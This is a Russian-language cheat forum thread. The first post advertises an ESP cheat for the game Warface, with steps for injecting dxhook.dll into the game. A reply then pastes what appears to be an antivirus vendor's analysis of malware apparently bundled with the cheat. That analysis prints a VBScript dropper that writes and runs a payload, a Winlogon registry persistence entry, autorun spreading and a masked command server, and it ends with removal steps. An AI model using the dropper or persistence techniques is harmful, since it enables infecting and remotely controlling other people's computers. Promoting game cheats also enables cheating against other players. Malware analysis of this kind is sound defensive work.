HOT [26.05.15][WF] LittleEngine by DiVa (Все виды ESP)

Тема в разделе "Читы для Warface", создана пользователем HardWell, 26 май 2015.

Статус темы:
Закрыта.
  1. Оффлайн

    HardWell

    На форуме с:
    30 сен 2012
    Сообщения:
    131
    Симпатии:
    200
    Баллы:
    140
    Пол:
    Мужской
    Всем привет.
    Представляю вашему внимаю LittleEngine от компании DiVa™ version 0.4.6 By VALKOI.
    Обновил весь функционал.
    Особенности:
    - Удобен в использовании
    - Красивый дизайн
    - Автоматический переход на сайт
    - Язык сделал Английский скоро будет выбор языков
    - Новая система анти-бана(не банит!)
    - ESP

    [​IMG]
    [​IMG]
    1) Скачать
    2) Розпаковать
    3) Запустить Игру
    4) На выборе PVP/PVE запустить Инжектор
    5) Выбрать нашь длл (dxhook.dll)
    6) Нажать Start
    7) Меню активировать на (HOME)


    Ссылки могут видеть только зарегестрированные пользователи. Для того что-бы скачать читы зарегистрируйтесь на форуме


    Ссылки могут видеть только зарегестрированные пользователи. Для того что-бы скачать читы зарегистрируйтесь на форуме


     
    Последнее редактирование: 26 май 2015
  2.  
  3. Оффлайн

    костя06117909 кошак

    На форуме с:
    2 апр 2015
    Сообщения:
    33
    Симпатии:
    1
    Баллы:
    3
    Пол:
    Мужской
  4. Оффлайн

    костя06117909 кошак

    На форуме с:
    2 апр 2015
    Сообщения:
    33
    Симпатии:
    1
    Баллы:
    3
    Пол:
    Мужской
    Технические детали
    Вредоносная программа, заражающая файлы на компьютере пользователя, и предоставляющая злоумышленнику удаленный доступ к зараженной машине. Является приложением Windows (PE-EXE файл). Имеет размер 62464 байта. Упакована UPX и неизвестным упаковщиком. Распакованный размер – около 75 КБ. Написана на C++.


    Распространение

    Копия вредоноса создается на всех доступных для записи съемных дисках, подключаемых к зараженному компьютеру, в каталоге:

    <имя зараженного диска>:\Recycler

    Также в корне диска создается файл
    <имя зараженного диска>:\autorun.inf

    обеспечивающий вредоносу возможность запускаться каждый раз, когда пользователь открывает зараженный раздел при помощи программы "Проводник".


    Нагрузка
    После запуска вредонос для контроля уникальности своего процесса в системе создает уникальный идентификатор с именем:

    KyUffThOkYwRRtgPP

    Также проверяется имя исполняемого файла вредоноса. Если имя отлично от "DesktopLayer.exe", тело вредоноса копируется в файл:
    %Program Files%\Microsoft\DesktopLayer.exe

    после чего, запускается на выполнение. Также каталог "Microsoft", содержащий копию вредоноса, может создаваться в каталогах:
    %HOMEDRIVE%
    %HOMEPATH%
    %APPDATA%
    %System%
    %WinDir%
    %Temp%


    После запуска вредонос запускает браузер, установленный в системе по умолчанию, и внедряет в адресное пространство его процесса исполняемый код, реализующий весь деструктивный функционал. Внедряемый код реализует выполнение следующих действий:
    • для автоматического запуска созданной ранее копии вредоноса изменяется значение ключа системного реестра:
      [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
      "Userinit" = "%System%\userinit.exe,,%Program Files%\microsoft\
      desktoplayer.exe"

      Таким образом, копия будет запускаться процессом "WINLOGON.EXE" даже при запуске компьютера в "безопасном режиме".
    • Предотвращается модификация ключа автозапуска реестра, а также файла "DesktopLayer.exe".
    • Заражаются файлы с расширениями:
      htm
      dll
      exe


      При заражении EXE и DLL файлов тело вируса дописывается в конец последней PE-секции целевого файла. При этом точка входа в программу изменяется таким образом, чтобы вирусное тело получало управление первым. HTM файлы заражаются путем дописывания в конец целевого файла скрипта следующего содержания:
      <SCRIPT Language=VBScript><!--
      DropFileName = "svchost.exe"
      WriteData = "4D5A… (тело вредоноса)"
      Set FSO = CreateObject("Scripting.FileSystemObject")
      DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
      If FSO.FileExists(DropPath)=False Then
      Set FileObj = FSO.CreateTextFile(DropPath, True)
      For i = 1 To Len(WriteData) Step 2
      FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
      Next
      FileObj.Close
      End If
      Set WSHshell = CreateObject("WScript.Shell")
      WSHshell.Run DropPath, 0
      //--></SCRIPT>


      Таким образом, при каждом запуске скрипта в каталоге хранения временных файлов текущего пользователя будет создаваться и запускаться на выполнение копия вредоноса:
      %Temp%\svchost.exe

      Зараженные HTML-страницы детектируются Антивирусом Касперского как "Trojan-Dropper.VBS.Agent.bp".
    • В рабочем каталоге исполняемого файла браузера создается конфигурационный файл "dmlconf.dat".
    • Для получения команд устанавливается соединение с сервером:
      fget-ca***r.com

      По полученной от злоумышленника команде вредонос может выполнять следующие действия:
      • загружать на зараженный компьютер файлы и запускать их на выполнение.
      • соединяться с другим сервером для получения команд.


    Инструкции по удалению
    Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

    1. При помощи

      Ссылки могут видеть только зарегестрированные пользователи. Для того что-бы скачать читы зарегистрируйтесь на форуме

      завершить процесс установленного по умолчанию браузера.
    2. Восстановить значение ключа системного реестра (

      Ссылки могут видеть только зарегестрированные пользователи. Для того что-бы скачать читы зарегистрируйтесь на форуме

      ):
      [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
      "Userinit" = "userinit.exe"

    3. Удалить файлы:
      %Program Files%\Microsoft\DesktopLayer.exe
      %Temp%\svchost.exe
      <имя зараженного диска>:\Recycler
      <имя зараженного диска>:\autorun.inf

    4. Удалить оригинальный файл вредоноса (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
    5. Не запускать EXE, HTM файлы и не перезагружать компьютер до полной проверки зараженного компьютера антивирусом.
    6. Очистить каталог Temporary Internet Files, который может содержать инфицированные файлы (

      Ссылки могут видеть только зарегестрированные пользователи. Для того что-бы скачать читы зарегистрируйтесь на форуме

      ).
    7. Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами (

      Ссылки могут видеть только зарегестрированные пользователи. Для того что-бы скачать читы зарегистрируйтесь на форуме

      ).


    Ссылки могут видеть только зарегестрированные пользователи. Для того что-бы скачать читы зарегистрируйтесь на форуме


    Ссылки могут видеть только зарегестрированные пользователи. Для того что-бы скачать читы зарегистрируйтесь на форуме


    Все права защищены. Зарегистрированные товарные знаки и знаки обслуживания являются собственностью их правообладателей.

    Ссылки могут видеть только зарегестрированные пользователи. Для того что-бы скачать читы зарегистрируйтесь на форуме

    |

    Ссылки могут видеть только зарегестрированные пользователи. Для того что-бы скачать читы зарегистрируйтесь на форуме

     
Статус темы:
Закрыта.

Поделиться этой страницей

Уважаемый пользователь!

Мы обнаружили, что вы блокируете показ рекламы на нашем сайте.

Просим внести его в список исключения или отключить AdBlock.

Наши материалы предоставляются БЕСПЛАТНО и единственным доходом является реклама.

Спасибо за понимание!